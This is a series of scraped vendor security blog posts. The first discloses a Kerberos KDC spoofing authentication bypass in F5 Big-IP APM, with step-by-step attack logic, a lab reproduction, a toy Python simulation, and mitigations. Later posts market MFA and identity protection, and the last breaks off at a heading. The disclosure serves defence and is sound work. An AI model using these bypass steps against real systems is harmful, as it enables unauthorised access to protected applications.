Last year we reported three Key Distribution Center (KDC) spoofing vulnerabilities in Cisco ASA, Palo Alto Networks PAN-OS and IBM QRadar. We mentioned that another one was coming, and now that F5 has issued a fix, we are publishing the fourth KDC spoofing vulnerability we identified, this time in Big-IP. The KDC spoofing vulnerability allows an attacker to bypass Kerberos authentication to Big-IP Access Policy Manager, bypass security policies and gain unfettered access to sensitive workloads. In some cases it can be used to bypass authentication to the Big-IP admin console as well. We worked closely with F5 engineers to fix this issue, resulting in the recently issued advisory. This blog post outlines the vulnerability, explains how to avoid these flaws when implementing Kerberos, and discusses mitigation steps for customers using Big-IP and other Kerberos-based systems.
### Explaining the Vulnerability

F5 Big-IP Application Delivery Services is a solution that delivers applications in a secure and scalable manner. One of its core components is Access Policy Manager (APM), which manages and enforces policies to ensure access is properly authenticated and authorized. APM is sometimes also used to protect access to the Big-IP admin console.

The vulnerability lies in F5's implementation of the Kerberos protocol. Kerberos is the most common protocol for on-premises authentication. It is widely used in corporate networks due to the popularity of Active Directory, and it is preferred over weaker authentication protocols such as NTLM. Kerberos can be used as the authentication protocol for authentication required by an APM policy. When a user accesses an application through Big-IP, they may be presented with a captive portal and required to enter a username and password. The username and password are verified against AD with the Kerberos protocol to ensure the user is who they claim to be. Therefore, bypassing Kerberos authentication allows an attacker to gain access to Big-IP applications without legitimate credentials.

For the Kerberos protocol to work, three things should happen:

- The user authenticates to the server
- The server authenticates to the client
- The KDC authenticates to the server

Apparently, KDC authentication to the server is often overlooked, perhaps because requiring it complicates configuration. However, if the KDC does not authenticate to the server, the security of the protocol is entirely compromised, allowing an attacker who has hijacked network traffic to authenticate to Big-IP with any password, even an invalid one. For Kerberos terminology and background on how a KDC spoofing attack works, see the end of this blog post.

Below is a screenshot of the instructions for configuring AD authentication for an access policy, taken from the F5 website.
After this configuration, when a user attempts to authenticate to an app sitting behind the proxy, the user is challenged to enter a username and password. When the user enters their password, the product uses Kerberos to authenticate to the domain controller (DC). However, APM does not request a service ticket; it grants access based on a successful AS_REP alone.

Unlike in other scenarios, F5 lets you configure an admin username and password. Theoretically, this password could be used to authenticate the DC and prevent the vulnerability. However, it is not used for that purpose, but only for fetching primary or nested groups, prompting the user for a password change, or performing a complexity check or a password reset.

### Spoofing Kerberos authentication

Here are the steps an attacker can take to spoof a DC and bypass this kind of authentication. Assume we have the ability to hijack the network communication between Big-IP and the DC:

- Create a fake DC with a username identical to the admin's username and a password of our choice.
- Initiate an authentication to Big-IP with that username and the password we chose.
- Big-IP authenticates with Kerberos; we hijack the Kerberos communication and return an AS_REP that corresponds to the password we chose, followed by a TGS_REP consisting of a service ticket encrypted with a key of our choice and a service session key of our choice, encrypted with the logon session key we handed out in our AS_REP.

Since at these phases the only verification Big-IP performs relies on the password we chose, Big-IP allows the authentication.

### Exploitation

We simulated an attack by redirecting the traffic between Big-IP and the KDC (in this case a domain controller) on port 88 (the Kerberos port) to our own Windows Server. We set up a fake domain on the Windows Server and made sure there is a user with the same UPN as the Big-IP administrator in the real domain.
We configured that user's password to be "1" in the fake domain. We then tried the following scenarios:

- Regular login (traffic not diverted): we managed to log in with the user's original password, as expected. When trying the password "1", the login failed.
- Logging in with the traffic diverted to our fake DC: logging in with the administrator's original password failed, but logging in with the password "1" worked.

### Prevention and Mitigation

#### Mitigation Steps for Security Professionals

- Upgrade your Big-IP to a fixed version.
- If a fixed version is not available for the version of Big-IP you are using, make sure MFA is enabled.
- Update your Silverfort policy for Big-IP accordingly.
- Continuously monitor your Kerberos authentication. Look for resources that request only AS_REQs; if a resource never sends a TGS_REQ, that is a red flag. Use Silverfort's open source tool to search the authentication logs for services that don't request service tickets.
- See the developer recommendations below for any internally developed applications that implement Kerberos and for systems you configured yourself.

#### For Developers

We recommend a few steps to make sure that your solution is not susceptible to KDC spoofing:

- Validate that the implementation of Kerberos requires a password or keytab. To validate the DC, you need some kind of shared secret. If your solution does not allow configuring a keytab file or a service account password, the application is surely susceptible to KDC spoofing.
- Run Wireshark to see which Kerberos requests are sent during authentication. If there is no TGS_REQ, that is a red flag.
- If you want to implement an authentication protocol yourself, follow the protocol specification diligently. We recommend taking the easier route and using an existing implementation of these protocols.
- Use third-party libraries properly; some third-party libraries require specific configuration to avoid KDC spoofing.
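To make the difference between the vulnerable and the spoof-proof behaviour concrete, here is an added example; it is not F5's, pam-krb5's or Silverfort's code. It models the AS and TGS exchanges with a toy authenticated-encryption stand-in (a SHA-256 keystream plus an HMAC tag, not real Kerberos encryption types), and the principal names, passwords and keytab secret are made up. `login_as_only` does what the text says APM did, accepting the user as soon as the AS_REP decrypts with the typed password; `login_with_ticket` additionally requests a ticket for its own service principal and checks that the ticket decrypts with its keytab key, which a fake KDC cannot produce. Each KDC also keeps a request log, so the last function applies the monitoring advice above and lists clients that only ever send AS_REQs.

```python
"""Added example, not F5's, pam-krb5's or Silverfort's code. Toy model of KDC spoofing:
the crypto is a SHA-256 keystream with an HMAC tag (NOT real Kerberos etypes) and the
principals, passwords and keytab secret below are made up for the demonstration."""
import hashlib, hmac, json, os

SERVICE = "HTTP/apm.example.com"            # assumed service principal name
KEYTAB_SECRET = "apm-keytab-secret"          # assumed keytab secret of the real service


def key_from_secret(secret: str) -> bytes:
    """Stand-in for Kerberos string-to-key."""
    return hashlib.sha256(secret.encode()).digest()

def _keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    out, counter = b"", 0
    while len(out) < length:
        out += hashlib.sha256(key + nonce + counter.to_bytes(4, "big")).digest()
        counter += 1
    return out[:length]

def seal(key: bytes, payload: dict) -> bytes:
    """Toy authenticated encryption: nonce || ciphertext || HMAC-SHA256 tag."""
    plaintext = json.dumps(payload, sort_keys=True).encode()
    nonce = os.urandom(16)
    ciphertext = bytes(a ^ b for a, b in zip(plaintext, _keystream(key, nonce, len(plaintext))))
    return nonce + ciphertext + hmac.new(key, nonce + ciphertext, hashlib.sha256).digest()

def unseal(key: bytes, blob: bytes) -> dict:
    """Inverse of seal(); raises ValueError when the key is wrong (tag mismatch)."""
    nonce, ciphertext, tag = blob[:16], blob[16:-32], blob[-32:]
    if not hmac.compare_digest(hmac.new(key, nonce + ciphertext, hashlib.sha256).digest(), tag):
        raise ValueError("wrong key")
    return json.loads(bytes(a ^ b for a, b in zip(ciphertext, _keystream(key, nonce, len(ciphertext)))))


class KDC:
    """A KDC is its principal database. A fake KDC is simply another instance whose
    secrets the attacker chose; it can never know the real service's keytab key."""
    def __init__(self, principals: dict):
        self.keys = {name: key_from_secret(secret) for name, secret in principals.items()}
        self.krbtgt_key = os.urandom(32)
        self.log = []   # (client, request type): what a DC records as events 4768/4769

    def as_exchange(self, client: str, user: str) -> dict:
        self.log.append((client, "AS_REQ"))
        session_key = os.urandom(32).hex()
        return {"enc_part": seal(self.keys[user], {"session_key": session_key}),
                "tgt": seal(self.krbtgt_key, {"cname": user, "session_key": session_key})}

    def tgs_exchange(self, client: str, tgt: bytes, sname: str) -> dict:
        self.log.append((client, "TGS_REQ"))
        tgt_body = unseal(self.krbtgt_key, tgt)
        svc_session_key = os.urandom(32).hex()
        return {"enc_part": seal(bytes.fromhex(tgt_body["session_key"]), {"svc_session_key": svc_session_key}),
                "ticket": seal(self.keys[sname], {"cname": tgt_body["cname"], "svc_session_key": svc_session_key})}


def login_as_only(kdc: KDC, client: str, user: str, password: str) -> bool:
    """Vulnerable pattern: accept the user once the AS_REP decrypts with the typed
    password. A KDC the attacker controls passes this check trivially."""
    rep = kdc.as_exchange(client, user)
    try:
        unseal(key_from_secret(password), rep["enc_part"])
        return True
    except ValueError:
        return False

def login_with_ticket(kdc: KDC, client: str, user: str, password: str, keytab_key: bytes) -> bool:
    """Spoof-proof pattern: also fetch a ticket for our own principal and make the KDC
    prove it knows our keytab key by decrypting that ticket with it."""
    try:
        rep = kdc.as_exchange(client, user)
        session_key = bytes.fromhex(unseal(key_from_secret(password), rep["enc_part"])["session_key"])
        tgs = kdc.tgs_exchange(client, rep["tgt"], SERVICE)
        ticket = unseal(keytab_key, tgs["ticket"])          # fails against a fake KDC
        enc = unseal(session_key, tgs["enc_part"])
        return ticket["cname"] == user and ticket["svc_session_key"] == enc["svc_session_key"]
    except (ValueError, KeyError):
        return False

def clients_without_service_tickets(log: list) -> set:
    """The monitoring advice: clients that only ever send AS_REQ and never a TGS_REQ."""
    seen = {}
    for client, request in log:
        seen.setdefault(client, set()).add(request)
    return {client for client, kinds in seen.items() if "TGS_REQ" not in kinds}

def run_scenarios() -> dict:
    """Replays the blog's scenarios: real DC versus the attacker's fake DC where admin's password is '1'."""
    real = KDC({"admin": "Correct-Horse-Battery", SERVICE: KEYTAB_SECRET})
    fake = KDC({"admin": "1", SERVICE: "attacker-picked-key"})
    keytab_key = key_from_secret(KEYTAB_SECRET)
    return {
        "as_only/real/right_pw": login_as_only(real, "apm-vulnerable", "admin", "Correct-Horse-Battery"),
        "as_only/real/pw_1": login_as_only(real, "apm-vulnerable", "admin", "1"),
        "as_only/fake/pw_1": login_as_only(fake, "apm-vulnerable", "admin", "1"),   # the bypass
        "ticket/real/right_pw": login_with_ticket(real, "apm-fixed", "admin", "Correct-Horse-Battery", keytab_key),
        "ticket/fake/pw_1": login_with_ticket(fake, "apm-fixed", "admin", "1", keytab_key),
        "as_only_clients": clients_without_service_tickets(real.log + fake.log),
    }
```

`run_scenarios()` reproduces the table in the text: the AS-only service accepts the attacker's password "1" as soon as its traffic is diverted, while the ticket-checking service rejects it because the fake KDC's service ticket does not decrypt with the real keytab key, and the request log singles out `apm-vulnerable` as the client that never asks for a service ticket. On a Windows domain controller the same check is a correlation of event 4768 (TGT requested) against 4769 (service ticket requested) by client address.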
For example, pam-krb5, a commonly used Kerberos PAM module, has to have a keytab configured to work properly. Here is the relevant paragraph from its documentation (https://github.com/rra/pam-krb5/blob/master/README.md):

### What's Next?

I am sure this is the last KDC spoofing vulnerability we will ever encounter.

### Background: An Overview of the Kerberos Protocol

The Kerberos authentication protocol was developed in the 1980s by Steve Miller and Clifford Neuman. It allows Single Sign-On (SSO) in a managed network, and its Active Directory (AD) implementation has turned it into the primary authentication protocol for on-premises enterprise environments. The protocol consists of three exchanges that provide mutual authentication between the user and the server accessed. When the user logs in, they enter their credentials and the Authentication Service (AS) exchange takes place. The user gets a Ticket Granting Ticket (TGT), which is later used to obtain tickets to specific services during the Ticket Granting Service (TGS) exchange. The service ticket is then used during the Client/Server exchange to complete the authentication.

#### 1. Authentication Service (AS) Exchange

During the AS exchange the user authenticates to the Key Distribution Center (KDC). In return, the user obtains the ticket and key required to authenticate to services in the network without re-entering credentials. When the user first enters their credentials, the client sends an AS_REQ to the Authentication Service (AS) function of the KDC. The AS_REQ carries pre-authentication data encrypted with the user's master key, which is derived from the user's password. The Authentication Service verifies the AS_REQ using the master key, which is also available to the KDC. After validating the AS_REQ, the KDC returns an AS_REP containing a logon session key, encrypted with the user's master key, and a Ticket-Granting Ticket (TGT), encrypted with the KDC's own key. The AS exchange is outlined below.
The TGT will be used in the TGS exchange to obtain access to specific services.

#### 2. Ticket-Granting Service (TGS) Exchange

When the user attempts to access a service in the network, the client sends a TGS_REQ to the Ticket Granting Server (TGS) function of the KDC. This message carries the TGT together with an authenticator encrypted with the logon session key obtained during the AS exchange. The TGS verifies the TGS_REQ and returns a TGS_REP. The TGS_REP contains a service session key and a service ticket, which is encrypted with the master key of the server that hosts the service. On a Unix-based system the server's master key is stored in a keytab file; on a domain member server it is derived from the computer account's password. The TGS exchange is outlined below.

#### 3. Client/Server Exchange

Now the client has everything it needs to authenticate to the service. The client sends an AP_REQ to the service, containing the service ticket and an authenticator encrypted with the service session key. The service decrypts the ticket with its own master key, recovers the service session key and uses it to validate the authenticator. Then the server returns an AP_REP message and the authentication is complete. The Client/Server exchange is outlined below.

#### Spoof-Proof Protocol

When the Kerberos protocol is implemented correctly, an attacker attempting to impersonate the KDC cannot bypass the authentication. Even if the attacker successfully creates a valid AS_REP in response to a hijacked AS_REQ, the attacker will never be able to engineer a valid service ticket: the service ticket is encrypted with the server's key, which the attacker does not have.

#### What is KDC Spoofing?

In 2000, Dug Song reported a vulnerability that affects the Kerberos protocol (Song, Dug. 2000. "Kerberos KDC Spoofing Vulnerability." 28 August).
He discovered that certain implementations and configurations of Kerberos clients fail to execute the Client/Server exchange and allow the authentication based on the success of the previous exchanges alone. This behavior is not secure and can be exploited. An attacker who is able to hijack the communication between the client and the DC can take the following steps:

- Create a fake KDC.
- Obtain a username authorized to access the service they want to attack.
- Create a user in the fake KDC with a password of the attacker's choice; let's call this password "1".
- Authenticate to the service with the obtained username and the password "1".
- Hijack the communication from the client to the DC and divert it to the fake KDC.
- During the AS exchange, return an AS_REP that corresponds to the password "1", the fake KDC key and a fake logon session key.
- During the TGS exchange, return any TGS_REP. The client will accept the authentication without performing an application exchange.

KDC spoofing attacks assume the attacker is able to hijack traffic to and from the KDC and answer on the KDC's behalf. This can be done using a variety of techniques. For example, if the attacker is on the same physical network segment as the client, it can perform an ARP spoofing attack as outlined in Network Security Hacks (Lockhart 2007). Another possible approach is to take over a networking device such as a switch or router and control the communication from there.

### Acknowledgements

The research and discovery of this vulnerability was a joint effort with Thierry Van Steirteghem, who worked at Exclusive Networks at the time of discovery.

---

- Published: 2021-04-08
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/what-is-multi-factor-authentication-mfa/

Multi Factor Authentication (MFA) is a security technology used to validate that users who authenticate with credentials are indeed who they claim to be.
MFA achieves this by requiring users to provide, on top of their credentials, additional evidence of their identity: something they know, something they have or something they are. The need for MFA arises from the fact that credentials alone no longer suffice as a trusted identifier of legitimate users. In recent years we have witnessed a sharp increase in the volume of attacks that use compromised user credentials to access target resources. According to Microsoft, MFA is 99.9% effective in preventing such identity-based attacks. Even if a user's credentials are compromised, MFA makes it incredibly difficult for attackers to pass the authentication requirements.

### Why is Multi Factor Authentication a Necessity?

The problem is that passwords are susceptible to compromise. Billions of compromised credentials are sold on hacker forums, and many attackers attempt to capture credentials and sell them to other threat actors who use them to access target resources. Various industry reports state that compromised credentials are the leading cause of enterprise data breaches.

The evolution of the IT landscape makes secure authentication more important than ever. Before the cloud era, in order to establish an initial foothold in the network, attackers had to bypass perimeter defenses and install malware on an endpoint or server. Today, the gradual transition to the cloud places volumes of sensitive business information on the public internet, only a password away from attackers' reach.

### How does Multi Factor Authentication Work?

MFA adds steps to the authentication process. The number of these steps varies per configuration and context. These are the three basic MFA categories:

#### Something You Know

The most basic example of this category is of course a password, or any variation of memorable pieces of data configured by or for the user.
This category also includes personal background questions which presumably only you would know how to answer. Generally speaking, this category is considered the least secure, since both passwords and private information can be compromised or guessed by attackers.

#### Something You Have

This category is much harder to compromise and includes various physical items only you possess, such as mobile phones, physical tokens, key fobs and smart cards. The physical item can serve either as a carrier of the verification step (for example, a mobile phone that shows a one-time password) or as the verifier itself, such as a physical token. The latter is considered more secure since it involves less data exchange in the authentication process, making it harder for an attacker to intercept.

#### Something You Are

This is considered the most secure factor category and includes your physical identifiers: most commonly a fingerprint on your mobile phone or hardware token, but also voice, facial recognition and any other unique biometrics.

Any combination of these three authentication-factor categories materially increases account security and reduces the likelihood of compromise.

### Examples of Traditional MFA solutions

In enterprise environments, MFA is often used with a Single Sign On (SSO) solution to increase the security of the single password used by the workforce and to help reduce MFA fatigue.

### Static vs. Risk-Based MFA

Static MFA means that every time a user attempts to access a resource, MFA is required. This can be cumbersome and disrupt operational workflows. To avoid such disruptions and align MFA with business needs, many organizations choose one or both of the following:

- Apply static MFA only to sensitive users when accessing sensitive resources. This can still be very cumbersome and disruptive for administrators who work with many sensitive resources on a daily basis.
- Apply a risk-based approach in which MFA is required only when the risk level is high.
This is called Adaptive Authentication, or Risk-Based Authentication (RBA), and entails the use of a risk engine that evaluates various factors and requires additional verification only when the risk level indicates that the provided credentials might be compromised.

There are various limitations to traditional MFA solutions, but that is a longer discussion. We will write a dedicated blog about these limitations in the next few weeks.

### Silverfort's Agentless MFA Solution: Complete Coverage for all Enterprise On-Prem and Multi-Cloud Resources

Silverfort provides a new, innovative technology that can enforce MFA on any asset, including those not covered until today, across on-prem and multi-cloud environments, without requiring any agents or proxies. Silverfort MFA achieves this by fundamentally altering the traditional MFA architecture. Instead of relying on agents on the devices, Silverfort communicates directly with the IAM (Identity and Access Management) solution itself, monitors the authentication protocols and enforces MFA on top of them.

Whenever a user attempts to access a resource, the user authenticates to an IAM solution: Active Directory, Okta, Ping, Entra ID (formerly Azure AD), etc. After authenticating to the IAM solution, the access request is routed to Silverfort. Silverfort analyzes the context of each user (or service account) access request using its AI-driven risk engine, then applies the appropriate access policy. For example, if the risk level is high, Silverfort can step up the authentication requirements and require the user to authenticate with MFA (the authenticator can be Silverfort's mobile MFA app or a third-party MFA solution). If the MFA challenge is correctly fulfilled, Silverfort instructs the IAM to grant the user access to the resource. If the MFA challenge isn't addressed, or if the access policy requires it, Silverfort can block access altogether.
You can see the full flow in this diagram:

### MFA Everywhere

Silverfort's architecture enables it to extend MFA to practically any resource that authenticates to the IAM solution in your environment, as well as to any access interface. As long as the resource you wish to access authenticates to the IAM, it is subject to Silverfort MFA. This makes Silverfort the only MFA solution that can deliver real-time prevention of common attack scenarios such as automated ransomware propagation and on-prem lateral movement. Learn more about Silverfort MFA here.

---

- Published: 2021-04-04
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/why-ending-wfh-might-make-security-worse/

As COVID-19 vaccine rollouts pick up steam, it's time to start thinking about the day after, and how a possible mass return of employees to their offices might affect corporate network security. At first glance, it would seem that the end of 'Work From Home' would strengthen the security posture of most organizations. After all, employees would be returning to the safety and comfort of the corporate network perimeter. But is working within the perimeter really more secure? Has it ever been?

Unfortunately, we are finding that hackers consistently find ways to bypass perimeter security controls and breach the network. The recent SolarWinds supply chain attack demonstrated that threat actors were able to compromise more than 10,000 networks without ever having to breach a firewall. Be it supply-chain attacks, zero-days in Internet-connected devices, or plain old brute-force attacks, there are many ways to gain access to the network and penetrate the perimeter. Furthermore, the return of WFH devices to corporate offices can introduce significant risk, since they have been exposed to multiple threat vectors. Such devices may have been used by family members for unsafe activities, or used over unprotected networks.
Since in many organizations internal network traffic is not inspected, some of these devices may well have been exposed to malware. Such malware may be waiting for the device to connect to a high-value corporate network, then exploit stolen credentials to move laterally across the network and access sensitive infrastructure and data.

### Why Enforcing Zero Trust Only on Cloud Apps Falls Short

Many security-conscious organizations have adopted a Zero Trust approach to protect their cloud applications from unauthorized access. With this approach, any device, including a device used for working from home, is considered untrusted and requires verification before it is allowed to access sensitive corporate resources. But all too often, a Zero Trust approach is enforced only on cloud applications. This leaves on-premises systems, administrative interfaces, infrastructure, IoT devices and endpoints exposed to access from compromised devices within the network.

### Limited Adoption of Zero Trust Security

While organizations understand the value of a Zero Trust security model and agree that it is a necessary part of their cybersecurity strategy, we still don't see widespread adoption. Implementing micro-segmentation with proxies, or adding protections that require software agents, is a very difficult task in today's diverse networks. Many organizations resort to implementing the model on a small subset of the organization's applications, rather than adopting a full network-wide Zero Trust security model.
### Best Practices for a Safe Return to the Office

Here are several security best practices to consider as employees start heading back to their workplaces:

- Monitor access from all devices, especially those used for WFH and over unsecured environments
- Use identity-based segmentation policies to prevent unauthorized use of the administrative interfaces of sensitive systems
- Enforce risk-based authentication for all access requests to both on-premises and cloud resources
- Implement and enforce network-wide identity-based Zero Trust policies

With the right architecture and tools, it is possible to implement Zero Trust policies across both on-premises and cloud infrastructure. Focusing on identity as the control plane is a good place to start. With hybrid WFH and in-the-office policies likely to remain in force for the foreseeable future, "never trust, always verify" has never been more important. To learn how Silverfort can help you reach these goals, feel free to reach out.

The above is excerpted from the RSA Conference library. To read the full article, click here.

---

- Published: 2021-03-11
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/hafnium-microsoft-exchange-zero-days-admin-access-critical-attack-surface/

Microsoft has recently disclosed that four zero-day vulnerabilities in Microsoft Exchange Server are being actively exploited in the wild by the Hafnium attack group. Three of these vulnerabilities are operable only in conjunction with an authentication bypass vulnerability or after gaining admin permissions with compromised credentials. This highlights once again that admin access is a critical attack surface that should be closely guarded. Microsoft released a security update that fixes these vulnerabilities. This is by far the most effective protection, and we urge you to install it ASAP. In addition, various security vendors released IOCs for their customers to detect whether these vulnerabilities have been exploited in their environments.
However, this is by no means the last zero-day event, or the last attack targeting admin interfaces. And while both the security update and the released IOCs mitigate the Hafnium threat, there is definitely a need for a proactive protection method that eliminates this attack surface altogether. Silverfort's Unified Identity Protection provides such a method, enabling identity and security teams to dramatically reduce attackers' ability to use compromised admin credentials to access, modify or run code on critical servers.

### What is the Actual Risk from Hafnium Zero Days?

Exchange servers typically contain sensitive enterprise data and are thus considered a high-value target for attackers. After gaining an initial foothold in the target network, attackers look to obtain privileged access, typically by compromising admin credentials. The unfortunate reality is that despite the multiple security solutions in place, attackers typically succeed in this task. In this attack, Hafnium exploits two types of zero-day vulnerabilities:

- The authentication bypass vulnerability CVE-2021-26855 allows the attacker to authenticate as the Exchange server and gain malicious access.
- Code execution and file-writing vulnerabilities (CVE-2021-26857, CVE-2021-26858, CVE-2021-27065) enable attackers to execute code and write files to any path on the server. To use them, the attacker must either exploit CVE-2021-26855 first or log in with admin credentials.

In this part of the kill chain the attackers perform what seems to be a legitimate login with legitimate credentials; it is therefore a blind spot that neither IAM solutions nor other security solutions can efficiently identify as a problem.

### Real-Time Protection for Admin Credentials with Silverfort

MFA has been proven to be a powerful control against the malicious use of compromised credentials. By requiring users to confirm their identity with a second factor, you can prevent attackers from gaining unauthorized access.
The problem is that until today, MFA solutions could not be implemented on access interfaces to on-prem servers, including Microsoft Exchange Server, regardless of whether the access is local or remote, over RDP or a command-line remote access tool. Fortunately, Silverfort now allows you to enforce this type of protection for administrative access in real time by implementing MFA for on-premises Exchange.

### MFA for Administrative Access

The policy requires you to enter:

- The Users: a list of all the accounts with administrative privileges on the Exchange Server
- The Source: every machine that is not part of the Exchange admins' machine group
- Desired Action: we recommend that MFA be enforced for any access attempt from these source machines to the Exchange Server

Screenshot 1: Sample Silverfort Policy

Since attackers connect from remote machines that administrators don't regularly use, any access attempt from these machines triggers an MFA request to the admin whose credentials were used by the attackers. The admin will deny (or ignore) the request, thus preventing the attackers from logging in.

### Monitoring and Blocking Access of Service Accounts

In many deployments, various service accounts are created for Exchange Servers. These machine-to-machine accounts introduce the same risk as human admin accounts, but they cannot be protected by MFA since there is no real person behind them. Since the behavior of service accounts is highly predictable, Silverfort can automatically identify them and compare their behavior against a baseline to detect any deviation that may indicate a possible compromise. Silverfort then provides policy suggestions that can be enabled at any time to block suspicious access, send alerts to your SIEM, write to the log, or any combination of the three.

### Visibility for Post-Breach Analysis

Silverfort generates a full audit trail of admin account activities and the risk level of each access attempt.
This visibility is highly useful if you choose not to enforce MFA. While this would not block the malicious access attempt in real time, it would provide actionable insights about suspicious logins and assist in conducting an efficient forensic analysis of prior malicious activity.

### Conclusion

Administrative access is one of the most critical attack surfaces in your network and should be protected accordingly. Enforcing MFA on all admin access to sensitive machines in your environment proactively prevents attackers from accessing them for malicious purposes, including the exploitation of the CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065 Hafnium zero-day vulnerabilities. Silverfort allows you to enforce MFA on any device without installing software agents on each Exchange server and without deploying proxies in your network. To learn more, schedule a call with one of our experts.

---

- Published: 2021-03-02
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/consolidating-your-hybrid-iam-on-microsoft-azure-ad/

Modern enterprise IT environments are highly diverse and include many different assets, from legacy IT infrastructure to modern cloud workloads. This drives the need for multiple IAM products, each covering a different environment: on-prem, cloud, secure remote access and others. These IAM solutions work in separate silos and provide different protection capabilities for different assets, creating both a management and a security problem.

In terms of Identity Protection, the problem is more severe. Cloud-native and modern web apps can be protected by Entra ID (formerly Azure AD) Conditional Access, Risk Based Authentication and MFA, which effectively prevent 99% of identity-based attacks. However, on-prem enterprise resources (IT infrastructure, homegrown apps, command-line access tools, databases, file shares, etc.) are natively supported by neither the SSO nor the Identity Protection measures of Entra ID.
This creates a critical security gap that had not been addressed until today. For the first time, Silverfort customers can simplify and optimize their Identity Protection by consolidating it in Entra ID (formerly Azure AD) for all their on-prem and multi-cloud resources. Entra ID Conditional Access, Risk-Based Authentication and Microsoft Authenticator MFA for Active Directory are now fully applicable to core enterprise resources they never supported before, including IT infrastructure, legacy homegrown apps, command-line access tools and many others. In this way, Silverfort enables enterprises to apply best-of-breed Identity Protection across all resources and access attempts.

### The Three-Step Journey Towards Entra ID (formerly Azure AD) Hybrid IAM Consolidation

Silverfort seamlessly enables enterprises to bridge their managed apps and resources into Entra ID (formerly Azure AD) as if they were SAML-based applications. Once bridged, these resources appear in the Entra ID console like any app that natively supports Azure AD management, and can be subject to Azure AD access policies. The path to full identity protection consolidation in Entra ID includes three steps:

### Step #1: Discovery of All Applications and Resources

The initial stage is to discover all the resources and applications in the on-prem and multi-cloud environment. Automating this process is a huge time saver for large enterprises, which would otherwise need to identify hundreds, if not thousands, of applications in their on-prem and cloud environments. Silverfort automatically discovers all these resources and applications, identifying those that natively support Entra ID (formerly Azure AD) SSO and those that don't.
### Step #2: Migration of Supported Apps into Entra ID (formerly Azure AD)

To accelerate and optimize the migration of SAML-based apps that are natively supported by Entra ID (formerly Azure AD), Silverfort provides actionable operational insights about application usage and dependencies. These insights help organizations prioritize the migration based on business and operational needs.

### Step #3: Bridging Unsupported Apps into Entra ID (formerly Azure AD)

For resources and applications that are not natively supported by Entra ID (formerly Azure AD), Silverfort enables organizations to connect them to Entra ID. The bridged apps appear in the Entra ID console with a Silverfort icon. It is now possible to apply authentication and access policies to these applications from the Entra ID console.

### What Is the User Experience Post Hybrid IAM Consolidation?

After completing the bridging process and configuring the authentication and access policies, every resource access attempt is monitored and protected. For example, you can now enforce an MFA policy on remote PowerShell. First, configure a policy that requires MFA when accessing a remote Domain Controller with PowerShell:

From the user's perspective, access works just as before: the user enters a PowerShell command, the DC name and user credentials:

However, with the Entra ID (formerly Azure AD) policy enforced, instead of immediately getting access to the DC, the user is prompted with a Microsoft login pop-up:

Then, based on the policy, the user receives an MFA notification on his or her cell phone. Only after the sign-in is approved can the user access the Domain Controller.

Want to see more?
Watch this short demo recording to see how this looks:

### Final Words

Today, access and authentication to resources that cannot be managed in Entra ID (formerly Azure AD) must be managed by other IAM solutions: Active Directory, a ZTNA solution, a VPN, a local database and so on. This creates both management and security challenges. Silverfort's agentless and proxyless technology seamlessly enables enterprises to bridge their managed apps and resources into Entra ID (formerly Azure AD) as if they were SAML-based applications. By consolidating all resources and applications into the Entra ID console, authentication and access to any asset can be managed as if it were natively supported by Entra ID and subject to Entra ID access policies. As simple as that.

Hybrid IAM Consolidation is about simplifying and optimizing your Identity Protection by consolidating it into a single interface. It is a key component in enhancing the security posture of your enterprise and gaining resilience against attacks that use compromised credentials to access your on-prem and cloud resources.

---

- Published: 2021-01-28
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/its-time-for-unified-identity-protection/

*****By Hed Kovetz, CEO and Co-Founder, Silverfort*****

Identity-based attacks, which use compromised credentials to access enterprise resources, continue to grow in volume, sophistication and scale. The high success rates of these attacks, whether as account takeover, malicious remote access or lateral movement, reveal an inherent weakness that persists in today's Identity Protection solutions and practices. In this post I'll review the reasons for this and introduce a new concept: Unified Identity Protection.
A purpose-built Unified Identity Protection platform can close these identity protection gaps and enable enterprises to regain the upper hand against identity attacks.

### What Are Identity-Based Attacks?

Any attack that uses compromised credentials to access enterprise resources, in the cloud or on-prem, is an identity-based attack. According to the 2020 Verizon Data Breach Investigations Report, stolen or compromised credentials were involved in over 80% of all data breaches and 77% of cloud breaches. However, identity-based attacks aren't used only to gain initial access into the network. They are also used to advance within the network itself. The modern enterprise hybrid network introduces numerous identity attack vectors, which attackers target in two main stages:

- Initial Access: malicious access to SaaS apps and IaaS in the public cloud, as well as penetrating the enterprise perimeter via compromised VPN or RDP remote connections.
- Lateral Movement: following up on an initial breach to advance from one asset to another using compromised credentials. Lateral movement of this kind appears both in Advanced Persistent Threats (APTs) and in automated malware or ransomware propagation.

Enterprises need to prevent the use of compromised credentials, not only to breach the perimeter but also for lateral movement. Unified Identity Protection, which extends beyond the perimeter to secure the use of credentials within the network itself, can achieve that.

### The Identity Protection Gaps in Today's Enterprise

Enterprises today fall short both in detecting whether a user authentication introduces risk and in preventing malicious authentication attempts. The detection gap stems from the fact that enterprises use multiple Identity and Access Management (IAM) solutions across the hybrid network.
A typical enterprise implements at least an on-premises directory, like Active Directory, a cloud IdP for modern web applications, a VPN for remote network access, and PAM for privileged access management. No single solution monitors and analyzes all of a user's authentication activity across all resources and environments. This materially reduces the ability to understand the full context of each access attempt and to identify anomalies that may indicate risky behavior or malicious use of compromised credentials.

The prevention gap results from the fact that essential IAM security controls, such as Multi-Factor Authentication (MFA), Risk-Based Authentication (RBA) and Conditional Access enforcement, do not cover all enterprise resources, leaving critical security gaps. As a result, many assets and resources remain unprotected, including proprietary and homegrown apps, IT infrastructure, databases, file shares, command-line tools, industrial systems and many other sensitive assets that can become prime targets for attackers. These assets continue to rely on password-based mechanisms and legacy protocols that cannot be protected by today's agent-based or proxy-based solutions, because most IAM security solutions are unable to integrate with them or do not support their protocols.

When we look at all the different assets in the hybrid enterprise network, and all the possible ways to access each of them, it's clear that protecting only a few of them is not enough. Any unprotected system leaves an open gap that can enable a data breach. Yet protecting all enterprise systems one by one, by implementing software agents, proxies and SDKs, is no longer realistic. This means that current IAM security solutions do not offer an effective way to prevent the use of compromised credentials for malicious access and lateral movement.

### How Can Unified Identity Protection Address These Gaps?
